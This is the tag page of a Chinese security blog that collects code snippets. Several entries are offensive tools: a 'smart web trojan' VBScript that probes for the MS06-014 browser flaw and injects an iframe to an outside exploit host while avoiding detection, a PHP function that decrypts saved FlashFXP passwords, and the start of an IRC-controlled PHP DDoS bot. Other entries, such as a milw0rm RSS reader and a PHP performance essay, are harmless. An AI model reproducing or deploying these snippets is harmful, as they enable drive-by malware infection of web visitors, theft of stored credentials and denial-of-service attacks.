首页 | 注册 | 登录 | 归档 | 搜索 | 标签 | 在线工具
浏览模式: 标准 | 列表 Tag: 代码收藏

浅谈javascript函数劫持

by luoluo
luoluonet_at_yahoo.cn

javascript函数劫持,也就是老外提到的javascript hijacking技术

» 阅读全文

Tags: 技术, 代码收藏

PHP Security-Shell RFI Scanner

php Security-Shell RFI scanner

 *   This program is free software; you can redistribute it and/or modify  *
 *   it under the terms of the GNU General Public License as published by  *
 *   the Free Software Foundation; either version 2 of the License, or     *
 *   (at your option) any later version.                                   *
 *                                                                         *
 *   This program is distributed in the hope that it will be useful,       *
 *   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
 *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         *
 *   GNU General Public License for more details.                          * 
*   Test over by cnfjhh

» 阅读全文

Tags: php, 代码收藏, scanner

Grab email addresses from MySQL

  #Grab email addresses from MySQL

» 阅读全文

Tags: 代码收藏, php

PHP DDoS Bot

<?php
/*
php ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";

» 阅读全文

Tags: php, ddos, bot, 代码收藏

simple miw0rm rss news graber


#!/usr/bin/perl

use LWP::Simple;
use 
XML::Simple;
use 
Term::ANSIColor;
$content get('http://milw0rm.com/rss.php');
$xml XMLin($content);
$num scalar(@{$xml->{channel}->{item}});
for (
$i=0$i<$num$i++){
print
colored("\nDate: $xml->{channel}->{item}->[$i]->{pubDate}\n"'yellow'),
colored("\nTitle: $xml->{channel}->{item}->[$i]->{title}\n"'green'),
colored("\nLink: $xml->{channel}->{item}->[$i]->{link}\n\n\n"'green');
};

Tags: perl, 代码收藏

vbscript&javascript 操作cookie

好东东,可以做的东东又不少了哦
先记录一下,研究看看

http://hi.baidu.com/myvbscript/blog/item/2f585aed8ae0fad6b21cb1e7.html

» 阅读全文

Tags: 代码收藏

flashfxp解密

amxku PS:一个是7j写的,一个是国外的,相比之下,国外的那个东,速度要快一些,7J可能该郁闷了。呵呵,学习学习 function flashfxp($data)
     {
     
$pass=substr($data2);
    
$flashfxp_key = array(y,0,A,0,3,0,6,0,z,0,A,0,4,0,8,0,d,0,E,0,h,0,f,0,r,0,v,0,g,0,h,0,G,0,R,0,g,0,5,0,7,0,h,0,5,0,U,0,l,0,D,0,v,0,3);
     for (
$i=0$i strlen($data) - 2$i+=2)
             {
             
$run = (Hexdec(substr($pass$i2)) ^ Hexdec(DecHex(ord($flashfxp_key[$i])))) - Hexdec(substr($data$i2));
             if (
$run 0)
                 
$run=$run 255;
             
$Num.=chr($run);
             }
     return 
$Num;
     }

» 阅读全文

Tags: 免杀破解, 学习, php, 代码收藏

56验证码识别程序

56验证码
包含排干扰的算法

PS : 点阵写得很完美的东东,好好学学。

附件: 验证码识别.rar [ 44.16 K, 下载次数:423 ]

Tags: php, 学习, 代码收藏

智能网马

<script language=VBScript>
on error resume next
set     server 
document.createElement("object")
server.setAttribute "classid""clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File server.createobject(Adodb.Stream,"")
if 
Not Err.Number 0 then
err
.clear
'msgbox "没有0614漏洞,页面转到ms07004exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
else
'
msgbox "存在0614漏洞,页面转到MS0614的exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

这样就优先执行0614,没有没有0614漏洞再执行ms07004,还可以再接着写,如果没有ms07004,就返回空页面算了,减少被发现的机率

来源:7jgd's blog

Tags: exp, 代码收藏, 网马

奶瓶(NP博士)的好文,真的很实在

村里版主奶瓶的好文,留下来记念他老人家。

这里所说的“大型”应用不是说像Google、eBay、Yahoo这类大型网站的具体实施,我也没有意图劝说读者放弃自己的概念和信仰,只是希望大家的系统可以运行得更快更流畅,可以承载更多的用户在线,希望可以给php的初学者一点帮助。
    关于php的执行效率,网上的专题文章很多,多以php、Java几个阵营的争论开始,以一个不确定的期待结束,很少看见一个明确的结论。确实,程序的执行效率是很难从比较中得出的。应用的方面不同,执行环境不同,效率的差别会差得比较大。而且效率也是需要权衡的,大家都知道汇编语言很底层,可以写出非常高效的程序,但是我还很少,应该说是几乎没看过有人用汇编做Web开发,而且有能力用汇编写出高效程序的人似乎都是值得大家仰视的,哈哈~我们没有必要去讨论php和汇编到底差多少,只要知道自己的php和别人的PHP差多少就可以了。

» 阅读全文

Tags: 代码收藏, php

Records:2012Next›